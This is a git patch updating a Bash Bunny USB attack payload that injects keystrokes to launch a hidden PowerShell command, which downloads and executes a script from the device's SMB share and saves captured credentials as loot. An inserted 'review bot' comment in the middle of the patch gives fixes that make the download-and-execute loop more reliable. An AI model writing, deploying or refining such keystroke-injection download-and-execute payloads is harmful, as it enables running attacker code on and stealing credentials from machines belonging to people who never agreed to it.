From 4d9bfeedd397db83a3d7dd0ac7fcd050dfe166d2 Mon Sep 17 00:00:00 2001
From: hink
Date: Tue, 2 May 2017 20:41:44 -0500
Subject: [PATCH] Updated psh_DownloadExecSMB payload for fw v1.2 (#209)

* Powershell SMB Delivery
* fixed smbserver.py call
* Combined ATTACK MODES, improved SMB check
* version fix
---
 .../execution/psh_DownloadExecSMB/payload.txt | 33 +++++++------------
 .../execution/psh_DownloadExecSMB/readme.md | 9 +++--
 2 files changed, 16 insertions(+), 26 deletions(-)

diff --git a/payloads/library/execution/psh_DownloadExecSMB/payload.txt b/payloads/library/execution/psh_DownloadExecSMB/payload.txt
index d04dacfa..b05f2e2d 100644
--- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt
+++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt
@@ -2,11 +2,11 @@
 #
 # Title: Powershell Download and Execute SMB
 # Author: LowValueTarget
-# Version: 1.0
+# Version: 1.2
 # Category: Powershell
 # Target: Windows XP SP3+ (Powershell)
 # Attackmodes: HID, RNDIS_ETHERNET
-# Firmware: >= 1.1
+# Firmware: >= 1.2
 #
 # Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
 # Ensure psh.txt exists in payload directory
@@ -15,17 +15,19 @@
 #
 # | Attack Stage | Description |
 # | ------------------- | ------------------------------|
-# | Stage 1 | HID |
-# | Stage 2 | RNDIS_ETHERNET |
-# | Stage 3 | Delivering powershell payload |
+# | Stage 1 | Powershell |
+# | Stage 2 | Delivering powershell payload |
 #
+ATTACKMODE RNDIS_ETHERNET HID
+
 # SETUP
 LED SETUP
 REQUIRETOOL impacket # required for SMB server
 GET SWITCH_POSITION
 GET TARGET_HOSTNAME
+GET HOST_IP
 PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
 # Check for psh.txt
@@ -48,30 +50,19 @@ mkdir -p ${LOOTDIR}/${HOST}-$COUNT
 # Log file
 LOGFILE=psh_smb.log
-# Prevent premature access to SMB server
-echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
-
 # Start SMB Server
 mkdir -p /loot
 python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
-# STAGE 1 - HID
+# STAGE 1 - Powershell
 LED STAGE1
-ATTACKMODE HID
-RUN WIN "powershell -WindowStyle Hidden \"while (\$TRUE) {If (Test-Connection 172.16.64.1 -count 1 -quiet) {iex (New-Object Net.WebClient).DownloadString('\\\172.16.64.1\s\psh.txt');New-Item \\\172.16.64.1\s\COMPLETE -ItemType file;exit}}\""
+RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
 # Remove tracks in the psh payload if you wish
-# STAGE 2 - ETHERNET/SMB
-LED STAGE2
-ATTACKMODE RNDIS_ETHERNET
-
-# Re-enable ICMP ping to trigger the powershell stager
-echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
-
-# STAGE 3 - Wait until payload retrieved
+# STAGE 2 - Wait until payload retrieved
 # Wait until payload is retrieved
-LED STAGE3
+LED STAGE2
 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
 # CLEANUP
@@ -81,6 +72,6 @@ LED CLEANUP
 mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
 rm /loot/${LOGFILE}
 # Sync file system
-sync; sleep 1; sync
+sync
 LED FINISH
diff --git a/payloads/library/execution/psh_DownloadExecSMB/readme.md b/payloads/library/execution/psh_DownloadExecSMB/readme.md
index 1a57f61d..42c29490 100644
--- a/payloads/library/execution/psh_DownloadExecSMB/readme.md
+++ b/payloads/library/execution/psh_DownloadExecSMB/readme.md
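Review bot: The `New-Item` marker in the new `RUN WIN` line still targets the hard-coded `\\\172.16.64.1\\s\\COMPLETE` while the download path now uses `$HOST_IP`, so if `GET HOST_IP` ever yields a different address the target fetches and runs psh.txt but never creates `/tmp/COMPLETE`, and the Stage 2 `while ! [ -f /tmp/COMPLETE ]` loop below waits forever; use the same variable and escaping in both places, `New-Item \\\\$HOST_IP\\s\\COMPLETE -ItemType file`. The `New-Object net.sockets.tcpclient ($HOST_IP,445)` probe has no delay between attempts: while RNDIS is still coming up each failed constructor appears to fall through as a false `If` and the loop retries immediately, and a successful probe's client is never closed, so a `Start-Sleep -m 500` in the loop body and a `.Close()` after the check would tame the busy-loop. The `smbserver.py ... s /tmp/` line shares the whole of `/tmp/` without authentication, and the marker write in the same `RUN WIN` line relies on that share being writable, so anything else the device keeps in `/tmp` is reachable the same way. The step that stages psh.txt into the share and the `LOOTDIR`/`HOST` setup are outside this hunk.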
@@ -2,11 +2,11 @@
 ## Powershell Download and Execute SMB
 * Author: LowValueTarget
-* Version: Version 1.0
+* Version: Version 1.2
 * Target: Windows XP SP3+ (Powershell)
 * Category: Powershell
 * Attackmodes: HID, RNDIS_Ethernet
-* Firmware: >= 1.1
+* Firmware: >= 1.2
 ## Description
@@ -21,6 +21,5 @@ Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer
 | Attack Stage | Description |
 | ------------------- | ------------------------------|
-| Stage 1 | HID |
-| Stage 2 | RNDIS_ETHERNET |
-| Stage 3 | Delivering powershell payload |
\ No newline at end of file
+| Stage 1 | Powershell |
+| Stage 2 | Delivering powershell payload |
\ No newline at end of file